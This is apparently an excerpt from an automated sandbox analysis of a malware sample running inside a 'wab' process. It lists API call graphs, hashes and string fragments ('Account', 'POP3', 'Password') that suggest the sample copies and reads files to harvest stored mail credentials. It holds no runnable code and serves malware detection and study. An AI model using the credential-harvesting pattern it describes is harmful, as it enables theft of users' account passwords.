                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: HeapProcess
                                • String ID:
                                • API String ID: 54951025-0
                                • Opcode ID: 5395e886374af18254cfbf35d1f6170799d71c5f5c624fa691df782c99529b0f
                                • Instruction ID: 55b23ee5d0f9070b0251f6c63c06e8d3b450914e9ed9def3f3013de070ea66ae
                                • Opcode Fuzzy Hash: 5395e886374af18254cfbf35d1f6170799d71c5f5c624fa691df782c99529b0f
                                • Instruction Fuzzy Hash: 61A011382802038F8B088E30A30E20E3AACAA202C030000A8A80AC0000EB2A88008B0A

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 145 21cb173a-21cb17fe call 21cbc030 call 21cb2c40 * 2 152 21cb1803 call 21cb1cca 145->152 153 21cb1808-21cb180c 152->153 154 21cb19ad-21cb19b1 153->154 155 21cb1812-21cb1816 153->155 155->154 156 21cb181c-21cb1837 call 21cb1ede 155->156 159 21cb199f-21cb19ac call 21cb1ee7 * 2 156->159 160 21cb183d-21cb1845 156->160 159->154 162 21cb184b-21cb184e 160->162 163 21cb1982-21cb1985 160->163 162->163 167 21cb1854-21cb1881 call 21cb44b0 * 2 call 21cb1db7 162->167 165 21cb1987 163->165 166 21cb1995-21cb1999 163->166 169 21cb198a-21cb198d call 21cb2c40 165->169 166->159 166->160 179 21cb193d-21cb1943 167->179 180 21cb1887-21cb189f call 21cb44b0 call 21cb1db7 167->180 175 21cb1992 169->175 175->166 182 21cb197e-21cb1980 179->182 183 21cb1945-21cb1947 179->183 180->179 196 21cb18a5-21cb18a8 180->196 182->169 183->182 184 21cb1949-21cb194b 183->184 186 21cb194d-21cb194f 184->186 187 21cb1961-21cb197c call 21cb16aa 184->187 189 21cb1951-21cb1953 186->189 190 21cb1955-21cb1957 186->190 187->175 189->187 189->190 193 21cb1959-21cb195b 190->193 194 21cb195d-21cb195f 190->194 193->187 193->194 194->182 194->187 197 21cb18aa-21cb18c2 call 21cb44b0 call 21cb1db7 196->197 198 21cb18c4-21cb18dc call 21cb44b0 call 21cb1db7 196->198 197->198 207 21cb18e2-21cb193b call 21cb16aa call 21cb15da call 21cb2c40 * 2 197->207 198->166 198->207 207->166
                                APIs
                                  • Part of subcall function 21CB1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D1B
                                  • Part of subcall function 21CB1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21CB1D37
                                  • Part of subcall function 21CB1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D4B
                                • _strlen.LIBCMT ref: 21CB1855
                                • _strlen.LIBCMT ref: 21CB1869
                                • _strlen.LIBCMT ref: 21CB188B
                                • _strlen.LIBCMT ref: 21CB18AE
                                • _strlen.LIBCMT ref: 21CB18C8
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _strlen$File$CopyCreateDelete
                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                • API String ID: 3296212668-3023110444
                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                • Instruction ID: d5c06f05fa647ff1eb03bb8a65f0df63a93441f9f0d67db1151da75b8e4c633d
                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                • Instruction Fuzzy Hash: EA61D179D04299EEEF158BE4E880BDEBBB9AF16300F00415AD204E7394EB745B46CB56

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _strlen
                                • String ID: %m$~$Gon~$~F@7$~dra
                                • API String ID: 4218353326-230879103
                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                • Instruction ID: 7db631e2363650d4c16acb1018c5f6571377cb66e293bed7df884c003936b60b
                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                • Instruction Fuzzy Hash: 3F7107B9D042699FDF119BF49894ADF7BFC9F19300F10409AE644D7241E678AB85CBA0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 285 21cb7cc2-21cb7cd6 286 21cb7cd8-21cb7cdd 285->286 287 21cb7d44-21cb7d4c 285->287 286->287 288 21cb7cdf-21cb7ce4 286->288 289 21cb7d4e-21cb7d51 287->289 290 21cb7d93-21cb7dab call 21cb7e35 287->290 288->287 292 21cb7ce6-21cb7ce9 288->292 289->290 291 21cb7d53-21cb7d90 call 21cb571e * 4 289->291 300 21cb7dae-21cb7db5 290->300 291->290 292->287 295 21cb7ceb-21cb7cf3 292->295 298 21cb7d0d-21cb7d15 295->298 299 21cb7cf5-21cb7cf8 295->299 302 21cb7d2f-21cb7d43 call 21cb571e * 2 298->302 303 21cb7d17-21cb7d1a 298->303 299->298 304 21cb7cfa-21cb7d0c call 21cb571e call 21cb90ba 299->304 305 21cb7db7-21cb7dbb 300->305 306 21cb7dd4-21cb7dd8 300->306 302->287 303->302 308 21cb7d1c-21cb7d2e call 21cb571e call 21cb91b8 303->308 304->298 313 21cb7dbd-21cb7dc0 305->313 314 21cb7dd1 305->314 309 21cb7dda-21cb7ddf 306->309 310 21cb7df0-21cb7dfc 306->310 308->302 317 21cb7ded 309->317 318 21cb7de1-21cb7de4 309->318 310->300 320 21cb7dfe-21cb7e0b call 21cb571e 310->320 313->314 322 21cb7dc2-21cb7dd0 call 21cb571e * 2 313->322 314->306 317->310 318->317 327 21cb7de6-21cb7dec call 21cb571e 318->327 322->314 327->317
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 21CB7D06
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB90D7
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB90E9
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB90FB
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB910D
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB911F
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB9131
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB9143
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB9155
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB9167
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB9179
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB918B
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB919D
                                  • Part of subcall function 21CB90BA: _free.LIBCMT ref: 21CB91AF
                                • _free.LIBCMT ref: 21CB7CFB
                                  • Part of subcall function 21CB571E: HeapFree.KERNEL32(00000000,00000000,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?), ref: 21CB5734
                                  • Part of subcall function 21CB571E: GetLastError.KERNEL32(?,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?,?), ref: 21CB5746
                                • _free.LIBCMT ref: 21CB7D1D
                                • _free.LIBCMT ref: 21CB7D32
                                • _free.LIBCMT ref: 21CB7D3D
                                • _free.LIBCMT ref: 21CB7D5F
                                • _free.LIBCMT ref: 21CB7D72
                                • _free.LIBCMT ref: 21CB7D80
                                • _free.LIBCMT ref: 21CB7D8B
                                • _free.LIBCMT ref: 21CB7DC3
                                • _free.LIBCMT ref: 21CB7DCA
                                • _free.LIBCMT ref: 21CB7DE7
                                • _free.LIBCMT ref: 21CB7DFF
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: 62ed39971007622f7edd882895c127e5908f3b25f626a22d9891a8c0ab1f488b
                                • Instruction ID: fac40e13730d4d2280b88dfb416bb17f5bc8ad350b62f78f8c70ee0ba3f87552
                                • Opcode Fuzzy Hash: 62ed39971007622f7edd882895c127e5908f3b25f626a22d9891a8c0ab1f488b
                                • Instruction Fuzzy Hash: 7E316D7A610306DFEB219B78D944B667BE9EF05390F10446DE848E7191DE31EB80CB11

                                Control-flow Graph

                                APIs
                                • _free.LIBCMT ref: 21CB59EA
                                  • Part of subcall function 21CB571E: HeapFree.KERNEL32(00000000,00000000,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?), ref: 21CB5734
                                  • Part of subcall function 21CB571E: GetLastError.KERNEL32(?,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?,?), ref: 21CB5746
                                • _free.LIBCMT ref: 21CB59F6
                                • _free.LIBCMT ref: 21CB5A01
                                • _free.LIBCMT ref: 21CB5A0C
                                • _free.LIBCMT ref: 21CB5A17
                                • _free.LIBCMT ref: 21CB5A22
                                • _free.LIBCMT ref: 21CB5A2D
                                • _free.LIBCMT ref: 21CB5A38
                                • _free.LIBCMT ref: 21CB5A43
                                • _free.LIBCMT ref: 21CB5A51
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 22c35cb3ce4be06c85d471785254ddf489bd08dda78cfaf94e97908156e54ae1
                                • Instruction ID: b66c076f3e30fb9c0b84fd87f45fd9d7bd6c3d7bb7cbc0ee10ede9545af7a9b0
                                • Opcode Fuzzy Hash: 22c35cb3ce4be06c85d471785254ddf489bd08dda78cfaf94e97908156e54ae1
                                • Instruction Fuzzy Hash: 5611807E660149FFCB11DF94D881CDD3FA9EF18350B5581A5BA08EF225DA32EB509B80

                                Control-flow Graph

                                APIs
                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D1B
                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21CB1D37
                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D4B
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D58
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D72
                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D7D
                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB1D8A
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                • String ID:
                                • API String ID: 1454806937-0
                                • Opcode ID: 5d21d677136c5972efccf98f0a29010647a39a334bd3e438e46e40286203eb1d
                                • Instruction ID: ed03ed8c2ad09ac0ce895af6a7778401f147325d10ae79a71551907da2ac73bf
                                • Opcode Fuzzy Hash: 5d21d677136c5972efccf98f0a29010647a39a334bd3e438e46e40286203eb1d
                                • Instruction Fuzzy Hash: 282160B998121CFFEB159BB09CCCEEB76ACEB28388F000965F512D2140D6749F458B70

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 386 21cb9492-21cb94ef GetConsoleCP 387 21cb9632-21cb9644 call 21cb2ada 386->387 388 21cb94f5-21cb9511 386->388 390 21cb952c-21cb953d call 21cb7c19 388->390 391 21cb9513-21cb952a 388->391 397 21cb953f-21cb9542 390->397 398 21cb9563-21cb9565 390->398 393 21cb9566-21cb9575 call 21cb79e6 391->393 393->387 402 21cb957b-21cb959b WideCharToMultiByte 393->402 400 21cb9609-21cb9628 397->400 401 21cb9548-21cb955a call 21cb79e6 397->401 398->393 400->387 401->387 408 21cb9560-21cb9561 401->408 402->387 404 21cb95a1-21cb95b7 WriteFile 402->404 406 21cb962a-21cb9630 GetLastError 404->406 407 21cb95b9-21cb95ca 404->407 406->387 407->387 409 21cb95cc-21cb95d0 407->409 408->402 410 21cb95fe-21cb9601 409->410 411 21cb95d2-21cb95f0 WriteFile 409->411 410->388 412 21cb9607 410->412 411->406 413 21cb95f2-21cb95f6 411->413 412->387 413->387 414 21cb95f8-21cb95fb 413->414 414->410
                                APIs
                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,21CB9C07,?,00000000,?,00000000,00000000), ref: 21CB94D4
                                • __fassign.LIBCMT ref: 21CB954F
                                • __fassign.LIBCMT ref: 21CB956A
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 21CB9590
                                • WriteFile.KERNEL32(?,?,00000000,21CB9C07,00000000,?,?,?,?,?,?,?,?,?,21CB9C07,?), ref: 21CB95AF
                                • WriteFile.KERNEL32(?,?,00000001,21CB9C07,00000000,?,?,?,?,?,?,?,?,?,21CB9C07,?), ref: 21CB95E8
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID:
                                • API String ID: 1324828854-0
                                • Opcode ID: 4ed5f46a6686d5e4d6a7f532015b7494d0594c2d89f23e049788402e5c858e41
                                • Instruction ID: 8a465b52a0d8f637dd2b32562dcb314a736dfa9e994053d647c5fcbe2ac6a5ee
                                • Opcode Fuzzy Hash: 4ed5f46a6686d5e4d6a7f532015b7494d0594c2d89f23e049788402e5c858e41
                                • Instruction Fuzzy Hash: C651D3B9D40209EFDB04CFA8D895BEEBBF8EF19310F10415AE956E7281D7309A41CB60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 415 21cb3370-21cb33b5 call 21cb3330 call 21cb37a7 420 21cb33b7-21cb33c9 415->420 421 21cb3416-21cb3419 415->421 423 21cb3439-21cb3442 420->423 424 21cb33cb 420->424 422 21cb341b-21cb3428 call 21cb3790 421->422 421->423 427 21cb342d-21cb3436 call 21cb3330 422->427 426 21cb33d0-21cb33e7 424->426 428 21cb33e9-21cb33f7 call 21cb3740 426->428 429 21cb33fd 426->429 427->423 437 21cb33f9 428->437 438 21cb340d-21cb3414 428->438 430 21cb3400-21cb3405 429->430 430->426 433 21cb3407-21cb3409 430->433 433->423 436 21cb340b 433->436 436->427 439 21cb33fb 437->439 440 21cb3443-21cb344c 437->440 438->427 439->430 441 21cb344e-21cb3455 440->441 442 21cb3486-21cb3496 call 21cb3774 440->442 441->442 444 21cb3457-21cb3466 call 21cbbbe0 441->444 448 21cb34aa-21cb34c6 call 21cb3330 call 21cb3758 442->448 449 21cb3498-21cb34a7 call 21cb3790 442->449 450 21cb3468-21cb3480 444->450 451 21cb3483 444->451 449->448 450->451 451->442
                                APIs
                                • _ValidateLocalCookies.LIBCMT ref: 21CB339B
                                • ___except_validate_context_record.LIBVCRUNTIME ref: 21CB33A3
                                • _ValidateLocalCookies.LIBCMT ref: 21CB3431
                                • __IsNonwritableInCurrentImage.LIBCMT ref: 21CB345C
                                • _ValidateLocalCookies.LIBCMT ref: 21CB34B1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                • String ID: csm
                                • API String ID: 1170836740-1018135373
                                • Opcode ID: 55f95dd93746db4d6bc79a41d0b472b8cb9b02996ea61db2ae88cd5f5a387b9a
                                • Instruction ID: 9ca1cd263ac0a4e96d8c3d2625664cc2ce341e8aed4f42a3abc772512ccbd937
                                • Opcode Fuzzy Hash: 55f95dd93746db4d6bc79a41d0b472b8cb9b02996ea61db2ae88cd5f5a387b9a
                                • Instruction Fuzzy Hash: 3D418B3CA00209EBCB01CF69C884A9FBFA5AF56724F149169E915EB291D7399B05CF90

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 21CB9221: _free.LIBCMT ref: 21CB924A
                                • _free.LIBCMT ref: 21CB92AB
                                  • Part of subcall function 21CB571E: HeapFree.KERNEL32(00000000,00000000,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?), ref: 21CB5734
                                  • Part of subcall function 21CB571E: GetLastError.KERNEL32(?,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?,?), ref: 21CB5746
                                • _free.LIBCMT ref: 21CB92B6
                                • _free.LIBCMT ref: 21CB92C1
                                • _free.LIBCMT ref: 21CB9315
                                • _free.LIBCMT ref: 21CB9320
                                • _free.LIBCMT ref: 21CB932B
                                • _free.LIBCMT ref: 21CB9336
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                • Instruction ID: bafea68fd02df61feebc50186cede018f0f7eff718b232da3eb1aca45d3c7665
                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                • Instruction Fuzzy Hash: E01193B5A90B09FED620AFF0DC45FCB7B9D9F14700F408824A699F6052DA34B7044753
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,21CB6FFD,00000000,?,?,?,21CB8A72,?,?,00000100), ref: 21CB887B
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,21CB8A72,?,?,00000100,5EFC4D8B,?,?), ref: 21CB8901
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 21CB89FB
                                • __freea.LIBCMT ref: 21CB8A08
                                  • Part of subcall function 21CB56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21CB5702
                                • __freea.LIBCMT ref: 21CB8A11
                                • __freea.LIBCMT ref: 21CB8A36
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                • String ID:
                                • API String ID: 1414292761-0
                                • Opcode ID: 502e622f225e21dcbb4c15da239b17f6df81790f3cfb1d181d0f7e4260a4f1cd
                                • Instruction ID: 981b1977aa4ffc58f7d8ff03491d5f807a5bd5a9ec31cda8c53edadcc8ccc86b
                                • Opcode Fuzzy Hash: 502e622f225e21dcbb4c15da239b17f6df81790f3cfb1d181d0f7e4260a4f1cd
                                • Instruction Fuzzy Hash: 3051F17AA14216EFEB158E60DC82FAF7BA9EB51754F10463CFD04D6180EB35EE5087A0
                                APIs
                                • _strlen.LIBCMT ref: 21CB1607
                                • _strcat.LIBCMT ref: 21CB161D
                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,21CB190E,?,?,00000000,?,00000000), ref: 21CB1643
                                • lstrcatW.KERNEL32(?,?), ref: 21CB165A
                                • lstrlenW.KERNEL32(?,?,?,?,?,21CB190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 21CB1661
                                • lstrcatW.KERNEL32(00001008,?), ref: 21CB1686
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: lstrcatlstrlen$_strcat_strlen
                                • String ID:
                                • API String ID: 1922816806-0
                                • Opcode ID: f4d11b16266ddebe7be8575c3e496d68cd81fd292635ea953ea3aace8fa1c331
                                • Instruction ID: 2c5a24767e14d21c7223ed345ee6b617e5f75f7b8779e3e8e2624b53bf7fa8d4
                                • Opcode Fuzzy Hash: f4d11b16266ddebe7be8575c3e496d68cd81fd292635ea953ea3aace8fa1c331
                                • Instruction Fuzzy Hash: 2421DA3A900205EFD705DF94EC84EFE77B8EF98710F14442AE505EB241DB34A74587A5
                                APIs
                                • lstrcatW.KERNEL32(?,?), ref: 21CB1038
                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21CB104B
                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21CB1061
                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 21CB1075
                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 21CB1090
                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 21CB10B8
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: lstrlen$AttributesFilelstrcat
                                • String ID:
                                • API String ID: 3594823470-0
                                • Opcode ID: b34c0ed97fd74fc2ebd5ece9b69dccbcf3a8cf36ae839f6f116d7a99571586bb
                                • Instruction ID: ba21050ee170a61586aeaee9699da85635b7bb5c8c8dc22138894fdb280efa70
                                • Opcode Fuzzy Hash: b34c0ed97fd74fc2ebd5ece9b69dccbcf3a8cf36ae839f6f116d7a99571586bb
                                • Instruction Fuzzy Hash: 1B217F3AA00219DBCF149BA0FC4CEDB376CEF44324F104296E959D72A1DA319B85CB40
                                APIs
                                • GetLastError.KERNEL32(?,?,21CB3518,21CB23F1,21CB1F17), ref: 21CB3864
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 21CB3872
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 21CB388B
                                • SetLastError.KERNEL32(00000000,?,21CB3518,21CB23F1,21CB1F17), ref: 21CB38DD
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: 0c1704b523a1494f687bc7bf7454d24950d1167ec6c9c19e38f251aa778f3a57
                                • Instruction ID: 43978e4fa9852bda116564e19cf4760ebf76f5eb292b0489da9116f6916152be
                                • Opcode Fuzzy Hash: 0c1704b523a1494f687bc7bf7454d24950d1167ec6c9c19e38f251aa778f3a57
                                • Instruction Fuzzy Hash: 6201D43F649722EEA206167A7C889572B94DB36775720223FE111D90D1EF274A018349
                                APIs
                                • GetLastError.KERNEL32(?,?,21CB6C6C), ref: 21CB5AFA
                                • _free.LIBCMT ref: 21CB5B2D
                                • _free.LIBCMT ref: 21CB5B55
                                • SetLastError.KERNEL32(00000000,?,?,21CB6C6C), ref: 21CB5B62
                                • SetLastError.KERNEL32(00000000,?,?,21CB6C6C), ref: 21CB5B6E
                                • _abort.LIBCMT ref: 21CB5B74
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: 13ea42445a4cef37667cb559476e1b51eeb18c85a721ca4c86b605e539e5e880
                                • Instruction ID: 2e1f59d14322c2681837765d6863c63aa14c063b57cc5c57d45d25e32232cd0e
                                • Opcode Fuzzy Hash: 13ea42445a4cef37667cb559476e1b51eeb18c85a721ca4c86b605e539e5e880
                                • Instruction Fuzzy Hash: 83F0C23E684502EED24626357C08E1F2E6A9FF6BB1B240124F915E65C0FE298B028A64
                                APIs
                                  • Part of subcall function 21CB1E89: lstrlenW.KERNEL32(?,?,?,?,?,21CB10DF,?,?,?,00000000), ref: 21CB1E9A
                                  • Part of subcall function 21CB1E89: lstrcatW.KERNEL32(?,?), ref: 21CB1EAC
                                  • Part of subcall function 21CB1E89: lstrlenW.KERNEL32(?,?,21CB10DF,?,?,?,00000000), ref: 21CB1EB3
                                  • Part of subcall function 21CB1E89: lstrlenW.KERNEL32(?,?,21CB10DF,?,?,?,00000000), ref: 21CB1EC8
                                  • Part of subcall function 21CB1E89: lstrcatW.KERNEL32(?,21CB10DF), ref: 21CB1ED3
